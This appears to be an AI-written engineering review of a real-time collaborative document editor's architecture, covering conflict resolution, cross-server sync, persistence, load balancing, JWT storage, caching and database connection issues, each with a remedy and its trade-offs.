Problem: Server failure causes lost in-memory state and reconnections.
Solution: Implement server recovery protocol with document state reconstruction, client reconnection strategy, and state reconciliation using database version.
Trade-offs: Significant complexity increase, possible data inconsistencies during recovery
The key insight is that real-time collaboration systems face fundamental tradeoffs between consistency, availability, and partition tolerance. The proposed solutions often shift complexity from one area to another, requiring careful analysis of your specific use case and scaling requirements. Would you like me to elaborate on any of these solutions or discuss alternatives?
This architecture presents several significant design concerns that would likely result in data loss, inconsistent user experiences, and scaling limitations in production environments. The most critical issues center around the conflict resolution strategy, inter-server synchronization mechanism, and database write patterns. While the high-level components (React, Node.js, PostgreSQL, Redis, WebSocket) represent sound technology choices, the implementation details—particularly the last-write-wins timestamp strategy and polling-based synchronization—introduce fundamental problems that compound at scale.
The analysis that follows identifies seventeen distinct failure modes, race conditions, and bottlenecks, categorizes them by severity, and provides concrete remediation strategies with explicit trade-off analyses. Organizations deploying this architecture should prioritize addressing the high-severity issues before any production rollout.
Issue: Client-Side Timestamp Conflict Resolution

Problem Description: The synchronization strategy relies on client-side timestamps to resolve conflicts, assuming all client clocks are synchronized and trustworthy. This assumption is fundamentally unsound. Client devices frequently have inaccurate clocks due to timezone changes, manual adjustments, battery depletion, or network time protocol delays. When two users edit the same paragraph simultaneously, the system cannot reliably determine which change should persist because the timestamp comparison itself is unreliable.
Consider a realistic scenario: User A and User B edit the same paragraph at nearly the same real instant. Due to clock drift, User A's device clock is 3 seconds behind real time, while User B's clock is accurate. Both changes arrive at the server within milliseconds of each other, but the timestamp comparison declares User B the winner despite User A typing first. User A's work is silently discarded, and they have no indication that their contribution was lost.
The problem escalates further with malicious actors. A user could deliberately manipulate their system clock to claim priority for any edit, enabling them to overwrite others' work consistently. There is no server-side authority establishing ground truth for edit ordering.
Proposed Solution: Operational Transformation or CRDT with Server-Authoritative Ordering
Replace the timestamp-based conflict resolution with Operational Transformation (OT) as used in Google Docs, or a Conflict-free Replicated Data Type (CRDT) approach. Both strategies establish a total ordering of operations at the server level, eliminating dependence on client clocks.
In the OT approach, each edit operation is transformed against concurrent operations to maintain document consistency. The server assigns a sequential operation ID and broadcasts transformations to all clients, ensuring all participants converge to the same document state regardless of edit timing. CRDTs achieve the same goal through mathematical guarantees, representing document state as a mergeable data structure that automatically resolves conflicts without requiring server intervention for each conflict.
The trade-off involves significant implementation complexity. OT requires careful transformation functions for every operation type and can become intricate for complex document structures. CRDTs offer stronger convergence guarantees but may impose performance overhead for large documents and can result in tombstones (deleted content markers) that must be garbage collected. Additionally, migrating existing documents to a new conflict resolution strategy requires a one-time transformation pass.
- Implementation Complexity: High
- Performance Impact: Moderate (additional transformation/merge computation)
- Data Loss Risk: Eliminated
- Migration Effort: Significant
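To make the OT idea concrete, here is the smallest possible transform: insert-vs-insert with a site-ID tiebreak, showing how two concurrent edits converge to the same document. Real OT needs a transform function for every pair of operation types (insert, delete, formatting); this is only a sketch with illustrative names.

```javascript
// Transform op against a concurrent insert: shift op's position right
// if the other insert lands before it (or at the same spot and the
// other site wins the deterministic tiebreak).
function transformInsert(op, against) {
  if (against.pos < op.pos ||
      (against.pos === op.pos && against.site < op.site)) {
    return { ...op, pos: op.pos + against.text.length };
  }
  return op;
}

function applyInsert(doc, op) {
  return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
}

const base = "ac";
const opA = { pos: 1, text: "b", site: "A" };   // A: "ac" -> "abc"
const opB = { pos: 2, text: "d", site: "B" };   // B: "ac" -> "acd"

// Each side applies its own op, then the transformed remote op;
// both converge to the same state.
const docA = applyInsert(applyInsert(base, opA), transformInsert(opB, opA));
const docB = applyInsert(applyInsert(base, opB), transformInsert(opA, opB));
```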
Issue: Polling-Based Cross-Server Synchronization

Problem Description: The current architecture addresses multi-server scalability by having each API server poll PostgreSQL every 2 seconds for changes. This approach introduces multiple failure modes that undermine the collaborative editing experience.
The most immediate problem is latency inconsistency. When User A on Server 1 makes a change, User B connected to Server 2 experiences a delay of up to 2 seconds before seeing that change, purely due to polling timing. User B might make their own edit during this window, believing the document is in state S when it has already progressed to state S+1. This creates the exact conflict scenario the system should prevent, but now with additional complexity because the conflict involves edits that were made against different base versions.
The polling mechanism also creates race conditions at the database level. Multiple servers polling simultaneously can create thundering herd patterns where database connections spike every 2 seconds, followed by idle periods. During high-edit-density moments, the database may struggle to process concurrent polling queries alongside write operations, potentially causing query timeouts or connection exhaustion.
Perhaps most concerning is the potential for missed updates. If PostgreSQL experiences a brief connectivity issue during a poll window, or if transaction isolation levels cause a change to be invisible during the query window, that change is simply lost from the perspective of users connected to other servers. The change exists in the database but will not be broadcast until the next poll cycle detects it, and there is no mechanism to guarantee detection.
Proposed Solution: Distributed Message Queue with Pub/Sub Architecture
Replace polling with a dedicated message distribution layer using Redis Pub/Sub or a purpose-built message broker like Apache Kafka or NATS. When Server 1 receives an edit, it immediately publishes the change to a channel specific to that document. All servers subscribed to that channel receive the update instantly and broadcast it to their connected clients.
This architecture eliminates polling latency entirely, reducing inter-server propagation from up to 2 seconds to typically tens of milliseconds. The message broker provides at-least-once delivery guarantees, ensuring changes are not lost during brief connectivity issues. Database polling can be reduced to a fallback mechanism for recovering from broker failures rather than a primary synchronization path.
The trade-offs involve operational complexity and a new failure domain. The message broker becomes a critical system component requiring monitoring, clustering for high availability, and capacity planning for message throughput. Redis Pub/Sub, while simpler to implement, does not provide message persistence by default—if a server is down when a message is published, it will miss that update entirely. Kafka or NATS JetStream offer persistence but require more sophisticated configuration and expertise.
- Implementation Complexity: Moderate
- Performance Impact: Significantly improved latency (2 seconds → milliseconds)
- Data Loss Risk: Reduced with persistent messaging
- Operational Overhead: Added broker management
Issue: Full-Snapshot Persistence Every 30 Seconds

Problem Description: The architecture saves complete HTML snapshots of documents every 30 seconds, regardless of edit volume. This approach creates several scalability and data integrity issues.
Storage efficiency degrades dramatically for frequently edited documents. A document that changes every few seconds will accumulate nearly identical snapshots, each consuming full document storage space. For a 50KB document edited continuously, the system generates 100KB of storage per minute, 6MB per hour, and 144MB per day—mostly redundant data. This storage growth is unbounded, eventually creating storage capacity issues and degrading database query performance.
The snapshot approach also loses edit history granularity. When conflicts occur or when users need to review changes, the system can only offer 30-second resolution snapshots rather than per-edit history. If a document is corrupted or a destructive edit is applied, recovery requires rolling back to the previous snapshot, potentially losing up to 30 seconds of legitimate work.
Database write amplification becomes severe under load. Every 30-second interval triggers write operations for all active documents simultaneously, creating periodic write spikes that stress the database. This thundering herd pattern at the storage layer mirrors the polling thundering herd at the synchronization layer.
Proposed Solution: Operational Log with Periodic Snapshots
Implement a write-ahead log that records each edit operation individually, with periodic snapshots for recovery purposes. The operational log stores only the delta (what changed, not the full document state), dramatically reducing storage requirements. A document that changes from "Hello" to "Hello World" stores only the insertion operation, not the complete document.
The operational log serves dual purposes: it enables fine-grained conflict resolution (since the system knows the exact sequence of operations) and it provides complete edit history for auditing or rollback. Periodic snapshots—perhaps every 10 minutes or based on operation count rather than fixed time intervals—provide recovery points without the storage overhead of 30-second granularity.
The trade-off involves increased implementation complexity. The system must now track operational history, handle log compaction to prevent unbounded growth, and manage the interaction between snapshots and operational replay. For recovery scenarios, the system must load the most recent snapshot and replay all operations since that snapshot, requiring operational replay capability.
- Implementation Complexity: Moderate to High
- Performance Impact: Reduced storage and write amplification
- Recovery Complexity: Increased (requires log replay)
- History Capability: Significantly enhanced
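The snapshot-plus-replay recovery path described above can be sketched directly (names assumed; the op format is a simplified positional insert):

```javascript
// Load the most recent snapshot, then replay every logged operation
// after the snapshot's sequence number to rebuild the current document.
function recover(snapshot, opLog) {
  let doc = snapshot.content;
  for (const op of opLog) {
    if (op.seq <= snapshot.seq) continue;   // already folded into snapshot
    doc = doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
  }
  return doc;
}

const snapshot = { seq: 2, content: "Hello" };   // compacted through op 2
const opLog = [
  { seq: 1, pos: 0, text: "He" },                // already in the snapshot
  { seq: 2, pos: 2, text: "llo" },               // already in the snapshot
  { seq: 3, pos: 5, text: " World" },            // replayed on recovery
];

const recovered = recover(snapshot, opLog);
```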
Issue: Round-Robin Load Balancing with Stateful WebSockets

Problem Description: Each API server maintains independent WebSocket connections to its clients, and the load balancer uses round-robin distribution without sticky sessions. This design creates a fundamental disconnect between the load balancing strategy and the WebSocket architecture.
When a user establishes a WebSocket connection, they are routed to Server A based on round-robin at that moment. Their subsequent HTTP API requests (for document loading, user information, etc.) may be routed to Server B, Server C, or any other server due to the stateless nature of HTTP load balancing. This creates an asymmetry where the user's WebSocket connection and their HTTP API calls may be served by different servers.
The immediate operational issue is session state management. If Server A stores the user's WebSocket connection and session state, but Server B receives their HTTP API requests, Server B has no access to the user's session context without consulting a shared session store. While Redis is intended for session caching, every API request requires a Redis lookup rather than local session access, adding latency to every operation.
More critically, during server maintenance or deployment, WebSocket connections may be disrupted. Without sticky sessions, users must reconnect and may be routed to a different server, losing their connection context. If the reconnection logic does not properly handle session transfer, users may experience authentication failures or document state discontinuity.
Proposed Solution: Sticky Sessions with Session State Externalization
Configure the load balancer to use sticky sessions (also known as session affinity) for WebSocket connections. This ensures that once a user is routed to a specific server, their subsequent connections—whether WebSocket or HTTP—continue routing to that server for the duration of their session. AWS Application Load Balancer supports sticky sessions via target group settings, as do most enterprise load balancers.
Combine sticky sessions with robust session state externalization in Redis. Even with sticky sessions, server failures can occur, requiring users to be re-routed to healthy servers. By storing all session state in Redis rather than server memory, any server can resume serving any user without session loss. The session state should include authentication tokens, document open state, cursor positions, and pending operations.
The trade-offs involve reduced load balancing flexibility and increased Redis dependency. Sticky sessions can create uneven load distribution if certain servers accumulate long-lived connections while others serve only brief requests. The system becomes more dependent on Redis availability—if Redis fails, new sessions cannot be established, and existing sessions may become inaccessible if their state cannot be read.
- Implementation Complexity: Low (configuration change)
- Performance Impact: Reduced latency for session access
- Availability Risk: Increased Redis dependency
- Load Distribution: Potentially less optimal
Issue: Long-Lived JWTs in localStorage

Problem Description: JWT tokens with 24-hour expiry stored in localStorage present multiple security vulnerabilities that could compromise user accounts and document data.
The localStorage storage mechanism is vulnerable to cross-site scripting (XSS) attacks. Any JavaScript injection vulnerability in the application—whether from a dependency, a parsing edge case, or a future feature—can be exploited to read localStorage contents. An attacker who injects malicious JavaScript can extract the JWT token and authenticate as that user for up to 24 hours. Unlike HTTP-only cookies, localStorage is accessible to JavaScript, providing no defense against XSS.
The 24-hour token lifetime without refresh tokens creates extended exposure windows. If a token is compromised, attackers have nearly a full day to exploit it before expiration. The absence of refresh tokens means users remain authenticated for the full duration without server-driven session invalidation capability. There is no mechanism to log out a specific user session remotely—if an employer needs to revoke access for a departing employee, they must wait for token expiration or implement a blocklist that adds operational complexity.
Additionally, JWT tokens contain claims that are visible to anyone who obtains the token. While the payload is encoded rather than encrypted, sensitive information in the token (user ID, organization ID, permissions) is trivially readable, creating information disclosure risk.
Proposed Solution: HTTP-Only Cookies with Refresh Token Rotation
Replace localStorage token storage with HTTP-only cookies, which are inaccessible to JavaScript and therefore immune to XSS-based token theft. Implement a refresh token rotation scheme where each authentication yields both an access token (short-lived, 15 minutes) and a refresh token (longer-lived, 7 days). When the access token expires, the client uses the refresh token to obtain a new access token, with the server invalidating the used refresh token and issuing a new one.
This architecture provides multiple security improvements. Access token compromise limits exposure to 15 minutes rather than 24 hours. Refresh token rotation enables server-side session invalidation—if a refresh token is used or appears suspicious, the server can invalidate it and require re-authentication. The server maintains a record of valid refresh tokens, enabling forced logout and session management capabilities.
The trade-offs involve implementation complexity and cookie security considerations. HTTP-only cookies are still vulnerable to cross-site request forgery (CSRF) attacks, requiring CSRF token protection. Cookie-based authentication requires careful SameSite attribute configuration and works poorly with non-browser clients. The refresh token database becomes a new critical system requiring storage, invalidation management, and potentially rate limiting.
Implementation Complexity: Moderate
Security Improvement: Significant reduction in credential exposure window
User Experience: Seamless re-authentication via refresh
New Dependencies: Refresh token storage and management
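The rotation-with-reuse-detection logic described above can be sketched in a few lines. This is a minimal in-memory model (a real deployment would back the store with Redis or a database, and the tokens would be signed JWTs rather than opaque UUIDs):

```typescript
import { randomUUID } from "crypto";

interface TokenPair { accessToken: string; refreshToken: string; }

class RefreshTokenStore {
  // refreshToken -> userId, for tokens that are still valid
  private live = new Map<string, string>();
  // tokens that were already rotated; seeing one again implies theft/replay
  private used = new Set<string>();

  issue(userId: string): TokenPair {
    const pair = {
      accessToken: `access-${randomUUID()}`,   // short-lived (e.g. 15 min)
      refreshToken: `refresh-${randomUUID()}`, // longer-lived (e.g. 7 days)
    };
    this.live.set(pair.refreshToken, userId);
    return pair;
  }

  // Rotate: invalidate the presented refresh token and issue a new pair.
  rotate(refreshToken: string): TokenPair {
    if (this.used.has(refreshToken)) {
      // Reuse of a rotated token: force re-authentication.
      throw new Error("refresh token reuse detected; re-authentication required");
    }
    const userId = this.live.get(refreshToken);
    if (!userId) throw new Error("unknown refresh token");
    this.live.delete(refreshToken);
    this.used.add(refreshToken);
    return this.issue(userId);
  }
}
```

Because the server records every rotated token, a stolen-but-already-used refresh token is detected on first replay, which is the property that enables forced logout.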
Problem Description: The last-write-wins conflict resolution strategy creates predictable data loss scenarios when multiple users edit the same content region simultaneously. This is not an edge case—it is the normal operating mode for collaborative editing.
Consider two users, User A and User B, both editing the same paragraph. User A types "The quick brown fox" while User B types "The lazy dog". Both changes are sent via WebSocket nearly simultaneously, and User B's client timestamp is 50 milliseconds later. User A's change is overwritten entirely by User B's change, and User A's text is lost. User A sees their work disappear and has no indication that it was overwritten rather than rejected—they simply see their paragraph replaced with different content.
The problem compounds with more users. With three or more simultaneous editors, last-write-wins becomes a lottery in which only the final change to arrive survives. Users whose changes happen to land earlier lose their work silently, regardless of when they actually typed, which undermines the collaborative editing experience.
Proposed Solution: Operational Transformation with Transform Functions
Implement Operational Transformation to preserve all concurrent edits rather than discarding all but one. When User A inserts "quick brown fox" and User B inserts "lazy dog" at the same position, the transformation function determines that these insertions can coexist—User A's text goes before User B's text, or vice versa, based on a deterministic ordering. Both contributions survive.
The transformation function must handle various operation types: insertions, deletions, formatting changes, and moving content. Each operation type requires a corresponding transformation function that describes how it should be adjusted when concurrent with another operation type. The server applies transformations before broadcasting, ensuring all clients receive operations in a consistent order and converge to the same document state.
The trade-offs are substantial. OT requires rigorous mathematical correctness—incorrect transformation functions can cause document corruption or divergence. The complexity increases with document features: tables, images, nested formatting, and comments each require their own transformation logic. Performance overhead exists because every operation must be transformed against concurrent operations before broadcasting. Debugging OT issues is difficult because the symptoms (incorrect text ordering, formatting loss) may appear long after the problematic operation.
Implementation Complexity: Very High
Correctness Verification: Challenging
Performance Overhead: Moderate
User Experience: Significantly improved
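To make the transform idea concrete, here is a minimal sketch covering only the insert-vs-insert case, with a numeric site ID as the deterministic tie-break (the site-ID field is an assumption for illustration; real OT needs a transform for every operation pair):

```typescript
interface Insert { pos: number; text: string; site: number; }

// Adjust `op` so it can be applied after `applied` has already taken effect.
function transformInsert(op: Insert, applied: Insert): Insert {
  const appliedFirst =
    applied.pos < op.pos ||
    (applied.pos === op.pos && applied.site < op.site); // tie-break by site ID
  return appliedFirst ? { ...op, pos: op.pos + applied.text.length } : op;
}

function apply(doc: string, op: Insert): string {
  return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
}

// Both application orders of two concurrent inserts must converge.
const a: Insert = { pos: 4, text: "quick ", site: 1 };
const b: Insert = { pos: 4, text: "lazy ", site: 2 };
const doc = "The fox";
const viaA = apply(apply(doc, a), transformInsert(b, a));
const viaB = apply(apply(doc, b), transformInsert(a, b));
// viaA === viaB === "The quick lazy fox"
```

Convergence for this one pair is easy; the difficulty the section describes comes from proving the same property across every combination of inserts, deletes, formatting, and structural operations.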
Problem Description: When a user loads a document, they receive the current state from PostgreSQL. If concurrent edits are occurring, the user may load a document that is already stale by the time they establish their WebSocket connection.
The sequence unfolds as follows: User C requests document D. The HTTP request routes to Server X, which queries PostgreSQL and returns the document at version 127. User C's browser receives this document and establishes a WebSocket connection to Server Y. Between the HTTP response and WebSocket establishment, User A and User B made edits advancing the document to version 130. When User C connects via WebSocket, they receive updates for versions 128, 129, and 130, but they initially rendered version 127. If User C begins editing immediately, they are editing against an outdated base state.
This creates the "zombie document" problem where the user's local state and the server's authoritative state have diverged. Edits made by User C may be based on text that has already changed on the server. The conflict resolution mechanism will handle this, but the user experience involves visual anomalies—text jumping, formatting changes, content appearing or disappearing—as the client catches up.
Proposed Solution: Version Acknowledgment Protocol
Implement a version handshake during document loading. When the client requests a document, the response includes the current version number. The client must acknowledge this version before receiving live updates. Any updates for versions prior to the acknowledged version are discarded, while updates for versions after the acknowledged version are queued for application after the initial version is confirmed.
The server tracks the version each client has acknowledged and only broadcasts updates beyond that version. If the client acknowledges version 127, but the document is now at version 135, the server sends updates 128 through 135 in sequence, allowing the client to catch up correctly. The client should display a loading or synchronizing indicator during this catch-up process.
The trade-off involves increased protocol complexity and potential latency. The version acknowledgment adds a round-trip before real-time updates begin, slightly delaying the collaborative experience. The server must maintain per-client version state, increasing memory requirements. However, the user experience benefit—eliminating visual anomalies during document load—generally justifies this cost.
Implementation Complexity: Moderate
User Experience: More consistent document state
Protocol Overhead: Additional round-trip
Server State: Per-client version tracking required
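The client-side half of the handshake reduces to a small state machine: updates at or below the acknowledged version are discarded, later ones must arrive in sequence. A sketch, with the update shape assumed for illustration:

```typescript
interface Update { version: number; payload: string; }

class CatchUpBuffer {
  private applied: Update[] = [];
  constructor(private ackedVersion: number) {}

  receive(update: Update): void {
    // Already contained in the loaded snapshot: drop silently.
    if (update.version <= this.ackedVersion) return;
    if (update.version !== this.ackedVersion + 1) {
      throw new Error(`gap: expected ${this.ackedVersion + 1}, got ${update.version}`);
    }
    this.applied.push(update);
    this.ackedVersion = update.version;
  }

  get version(): number { return this.ackedVersion; }
  get appliedCount(): number { return this.applied.length; }
}
```

In the scenario above, a client that loaded version 127 and then receives a replay of 126 through 130 ends up at version 130 having applied exactly three updates.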
Problem Description: The CloudFront CDN caches API responses for 5 minutes, and PostgreSQL read replicas serve read-heavy operations. This combination creates a cache stampede scenario when a popular document's cache expires.
When the cache TTL expires for a frequently accessed document, all concurrent requests for that document bypass the cache and hit the read replicas simultaneously. If the document is particularly popular—imagine a company-wide announcement document accessed by thousands of employees—the cache expiration creates a thundering herd of database queries. Even with read replicas, the sudden query spike can overwhelm the database, causing increased latency or temporary unavailability.
The problem is compounded by the read replica architecture. If the primary database must handle writes while replicas are being stampeded, resource contention increases. The cache expiration is uniform regardless of access patterns, meaning rarely-accessed documents consume cache slots while popular documents repeatedly trigger cache misses.
Proposed Solution: Probabilistic Early Expiration with Request Coalescing
Implement probabilistic early expiration (also known as jittered TTL) where cache entries are randomly invalidated up to 20% before their nominal expiration time. This spreads cache expiration across time rather than concentrating it at fixed intervals.
Combine this with request coalescing at the API server level. When multiple requests for the same document arrive during a cache miss, the first request proceeds to the database while subsequent requests wait for that result rather than making redundant database calls. This "request coalescing" or "single-flight" pattern prevents N database queries for N concurrent requests, reducing the query to 1.
The trade-offs involve implementation complexity and potential stale data exposure. Request coalescing requires tracking in-flight requests and managing waiting clients, adding memory overhead and synchronization requirements. Probabilistic early expiration means some clients receive slightly older data, though for document content this is generally acceptable. The cache behavior becomes less predictable, which can complicate debugging.
Implementation Complexity: Moderate
Database Protection: Significant improvement
Latency Consistency: Improved for popular documents
Staleness: Slightly increased
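Both techniques are short to sketch: a jittered TTL so expirations spread out in time, and a single-flight map so N concurrent misses trigger one backend fetch. The fetcher below is a stand-in for the actual database query:

```typescript
// Expire uniformly at random within the last `earlyFraction` of the TTL.
function jitteredTtlMs(nominalMs: number, earlyFraction = 0.2): number {
  return nominalMs * (1 - earlyFraction * Math.random());
}

class SingleFlight<T> {
  private inFlight = new Map<string, Promise<T>>();

  do(key: string, fetcher: () => Promise<T>): Promise<T> {
    const existing = this.inFlight.get(key);
    if (existing) return existing; // coalesce onto the running fetch
    const p = fetcher().finally(() => this.inFlight.delete(key));
    this.inFlight.set(key, p);
    return p;
  }
}
```

With this pattern, a thousand simultaneous requests for the same expired document produce one database query; the other 999 await the same promise.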
Problem Description: Every document change is written directly to PostgreSQL, creating a direct relationship between edit frequency and database load. This architecture cannot scale beyond the database's write throughput capacity.
PostgreSQL write throughput is limited by several factors: disk I/O for the write-ahead log, lock contention for row-level updates, index maintenance for each modified row, and connection handling for write operations. Under heavy edit load—imagine a document with 50 active collaborators all typing simultaneously—the database becomes the bottleneck. Each keystroke generates a write operation, and PostgreSQL can only process so many writes per second before latency increases.
The problem intensifies with document partitioning by organization ID. While partitioning distributes load across database instances, it does not increase overall write capacity. Organizations with highly collaborative documents will still saturate their partition's write capacity. The partitioning strategy helps with data isolation and query performance but does not address the fundamental write bottleneck.
Proposed Solution: Write Buffering with Batch Persistence
Implement a write buffer layer between WebSocket handlers and PostgreSQL. Rather than writing every change immediately, changes are accumulated in memory (or in Redis) and persisted to PostgreSQL in batches. This transforms thousands of individual writes into hundreds of batch operations, dramatically reducing database load.
The batch persistence should occur based on time intervals (every 1-2 seconds) or size thresholds (accumulating 100-500 changes), whichever occurs first. The buffer also needs an explicit durability story: if the server crashes before persistence, buffered changes are lost. Consider using Redis with persistence enabled as the buffer, accepting that some changes may be lost during Redis failures in exchange for reduced PostgreSQL load.
The trade-offs are a data loss window and added persistence latency. Changes spend time in the buffer before reaching durable storage, creating a window where server failure causes data loss. Batch persistence introduces slight delays in change visibility for users loading documents via the HTTP API (though WebSocket users see changes immediately). The buffering logic adds complexity, requiring careful handling of buffer overflow, persistence failures, and concurrent edit conflicts within the buffer.
Implementation Complexity: Moderate
Database Throughput: Significantly improved
Data Durability: Reduced (buffered changes vulnerable)
Change Latency: Slightly increased for persisted state
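The buffer's flush policy (size threshold or timer, whichever fires first) can be sketched as below. `persistBatch` stands in for a batched PostgreSQL insert; real code must also handle persistence failures and backpressure:

```typescript
interface Change { docId: string; op: string; }

class WriteBuffer {
  private pending: Change[] = [];
  private timer: ReturnType<typeof setTimeout> | null = null;

  constructor(
    private persistBatch: (batch: Change[]) => void,
    private maxBatch = 100,
    private maxDelayMs = 1000,
  ) {}

  add(change: Change): void {
    this.pending.push(change);
    if (this.pending.length >= this.maxBatch) {
      this.flush(); // size threshold reached
    } else if (!this.timer) {
      this.timer = setTimeout(() => this.flush(), this.maxDelayMs);
    }
  }

  flush(): void {
    if (this.timer) { clearTimeout(this.timer); this.timer = null; }
    if (this.pending.length === 0) return;
    const batch = this.pending;
    this.pending = [];
    this.persistBatch(batch); // one round-trip instead of `batch.length`
  }
}
```

With a batch size of 3, seven incoming changes produce three database round-trips instead of seven.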
Problem Description: Each API server maintains WebSocket connections to its clients, and Node.js has inherent limits on concurrent connections due to memory and file descriptor constraints.
Node.js can maintain thousands of concurrent WebSocket connections, but there are practical limits. Each connection consumes memory for the WebSocket object, associated state, and buffer space. Operating systems limit file descriptors, and each WebSocket connection consumes at least one file descriptor. At high connection counts, garbage collection overhead increases as more objects exist in the heap.
The architecture's assumption that "horizontal scaling by adding more API servers" solves this problem is partially correct but introduces coordination challenges. Adding servers increases total connection capacity but also increases the complexity of inter-server communication. The current polling mechanism for change propagation becomes less adequate as server count increases—more servers mean more polling instances hitting the database.
Proposed Solution: WebSocket Gateway Layer
Introduce a dedicated WebSocket gateway layer that specializes in connection management. This gateway can be implemented using Socket.IO with Redis adapter, or a purpose-built WebSocket server like Centrifugo or Pushpin. The gateway maintains all WebSocket connections, while API servers handle business logic and database operations.
The gateway architecture provides several benefits. First, connection management is optimized at the gateway level, using efficient WebSocket implementation patterns. Second, the gateway can be scaled independently of API servers based on connection counts. Third, all clients connect through a smaller number of gateway instances, simplifying the pub/sub topology for change propagation.
The trade-offs involve additional infrastructure components and potential single points of failure. The gateway layer becomes a critical system component requiring high availability configuration. The gateway must maintain connections while API servers process logic, requiring a communication mechanism between gateway and API layers (message queue or direct RPC). Client connections must handle gateway failures, requiring reconnection logic that routes to healthy gateways.
Implementation Complexity: Moderate to High
Connection Scalability: Significantly improved
Infrastructure Overhead: Added gateway layer
Failure Modes: New gateway failure domain
Problem Description: Redis serves as the session cache for all API servers, creating a potential contention point as session operations scale.
Session cache operations include reading session data during API requests, writing session updates (token refresh, preference changes), and session expiration processing. Under load, these operations compete for Redis resources. If Redis becomes saturated with session operations, API request latency increases, potentially cascading into timeouts and failures.
The session cache architecture also creates a dependency on Redis availability. If Redis becomes unavailable, new sessions cannot be established, and existing sessions cannot be validated. While the application might continue serving requests for users with cached session data in API server memory, any operation requiring session validation fails.
Proposed Solution: Tiered Caching with Local Memory Fallback
Implement a tiered caching strategy where API servers maintain local in-memory caches of frequently accessed session data, with Redis serving as the authoritative backend. Session reads check local cache first, reducing Redis read operations. Writes invalidate the local cache entry and update Redis asynchronously.
The local cache should use a TTL significantly shorter than the session duration (perhaps 5 minutes) to ensure eventual consistency without requiring explicit cache invalidation messages between servers. This provides resilience against brief Redis unavailability—sessions continue being valid based on local cache during Redis outages.
The trade-offs involve cache consistency and memory overhead. Local caching means slight staleness in session state (up to the local TTL), which is generally acceptable for session data. Each API server consumes memory for local session cache, though this is typically a small fraction of available RAM. The implementation requires careful cache key management and invalidation logic.
Implementation Complexity: Low to Moderate
Redis Load: Reduced
Availability: Improved resilience to Redis issues
Consistency: Eventual rather than strong
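The two-tier lookup can be sketched as follows. Redis is stubbed here as a plain `Map`; local entries carry their own short TTL so staleness is bounded without cross-server invalidation messages:

```typescript
interface Entry { value: string; expiresAt: number; }

class TieredSessionCache {
  private local = new Map<string, Entry>();
  constructor(
    private backend: Map<string, string>, // stand-in for Redis
    private localTtlMs = 5 * 60 * 1000,
    private now: () => number = Date.now,
  ) {}

  get(key: string): string | undefined {
    const hit = this.local.get(key);
    if (hit && hit.expiresAt > this.now()) return hit.value; // local hit
    const value = this.backend.get(key); // fall through to Redis
    if (value !== undefined) {
      this.local.set(key, { value, expiresAt: this.now() + this.localTtlMs });
    }
    return value;
  }

  set(key: string, value: string): void {
    this.local.delete(key); // invalidate local copy, then update backend
    this.backend.set(key, value);
  }
}
```

Note the resilience property the text describes: a session read that already populated the local tier keeps succeeding even if the backend briefly loses the key.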
Problem Description: Each API server maintains connections to PostgreSQL for write operations and potentially for read operations. As API servers scale horizontally, total database connections increase proportionally, eventually exhausting the PostgreSQL connection limit.
PostgreSQL has configurable connection limits (the default max_connections is 100, commonly raised to a few hundred, but not unlimited). Each API server might maintain 10-20 database connections for connection pooling. With 20 API servers, 200-400 connections are consumed just by the application, potentially exceeding database capacity before accounting for administrative connections, replicas, and maintenance operations.
The connection exhaustion manifests as errors on API requests that require database access. Users experience failed saves, inability to load documents, or authentication failures as connections time out or are refused. The errors are intermittent and load-dependent, making them difficult to diagnose.
Proposed Solution: Connection Pooling Proxy
Introduce a connection pooling proxy (PgBouncer, PgPool-II, or Amazon RDS Proxy) between API servers and PostgreSQL. The proxy maintains a smaller pool of actual database connections and multiplexes many application connections across these connections.
PgBouncer is particularly well-suited for this architecture. It supports transaction-mode pooling (connections are returned to the pool after each transaction), minimizing connection count while maintaining application semantics. The proxy presents connection semantics identical to direct database connections—API servers connect to PgBouncer as if it were PostgreSQL.
The trade-offs involve additional infrastructure and potential latency overhead. The proxy adds a network hop and processing step for each database operation, though this overhead is typically negligible (1-2 milliseconds). The proxy becomes a single point of failure if not configured for high availability. Connection pooling modes must be carefully chosen—transaction-mode pooling works for this architecture but breaks applications that require session-level state on connections.
Implementation Complexity: Moderate (infrastructure configuration)
Connection Efficiency: Significantly improved
Latency: Slight increase
Operational Overhead: Proxy management required
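As a sketch of what the proxy configuration looks like, a minimal PgBouncer fragment might read as follows (host names and pool sizes are illustrative, not tuning advice):

```ini
[databases]
docs = host=postgres-primary port=5432 dbname=docs

[pgbouncer]
pool_mode = transaction      ; return connection to pool after each transaction
max_client_conn = 2000       ; connections accepted from API servers
default_pool_size = 20       ; actual PostgreSQL connections per database/user
server_idle_timeout = 60
```

Here 2,000 application connections multiplex over roughly 20 real PostgreSQL connections, which is the efficiency gain described above.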
Problem Description: When WebSocket connections fail and reconnect, the frontend must resynchronize document state. The current architecture lacks explicit reconnection protocols, potentially causing state loss or inconsistency.
If a user's WebSocket connection drops temporarily (network blip, server restart, mobile handoff), they must re-establish the connection and resynchronize their document view. Without explicit reconnection logic, the frontend may display stale data, lose cursor position, or display duplicate content as changes are re-broadcast.
Proposed Solution: Explicit Reconnection Protocol with State Reconciliation
Implement a reconnection handshake where the client provides its last known document version upon reconnecting. The server responds with changes since that version, enabling the client to catch up efficiently. The client should also store recent pending operations locally (localStorage or IndexedDB) and retransmit them on reconnection if the server indicates they were not processed.
The trade-off involves frontend complexity and storage requirements. The reconnection logic must handle various failure scenarios: server restart (no state preserved), network partition (client state may be ahead or behind), and concurrent edits during disconnection. Local storage of pending operations adds code complexity but significantly improves user experience during connection failures.
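The server-side decision on reconnect reduces to a small function: replay from the client's last-seen sequence when the gap is small and the needed operations are still retained, otherwise fall back to a full state sync. Thresholds and field names here are illustrative assumptions:

```typescript
type SyncPlan =
  | { kind: "replay"; from: number }
  | { kind: "full-state" };

function planResync(
  clientLastSeq: number,
  serverSeq: number,
  oldestRetainedSeq: number,
  maxReplay = 500,
): SyncPlan {
  const gap = serverSeq - clientLastSeq;
  if (gap <= 0) return { kind: "replay", from: serverSeq + 1 }; // already current
  // Replay only if the needed operations are retained and the gap is small.
  if (clientLastSeq + 1 >= oldestRetainedSeq && gap <= maxReplay) {
    return { kind: "replay", from: clientLastSeq + 1 };
  }
  return { kind: "full-state" };
}
```

The same function covers the server-restart case naturally: if the operation log was lost, `oldestRetainedSeq` is ahead of the client's position and the plan degrades to a full state sync.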
Problem Description: The architecture lacks explicit monitoring, alerting, and observability components. Without visibility into system health, operators cannot detect failures, performance degradation, or security incidents.
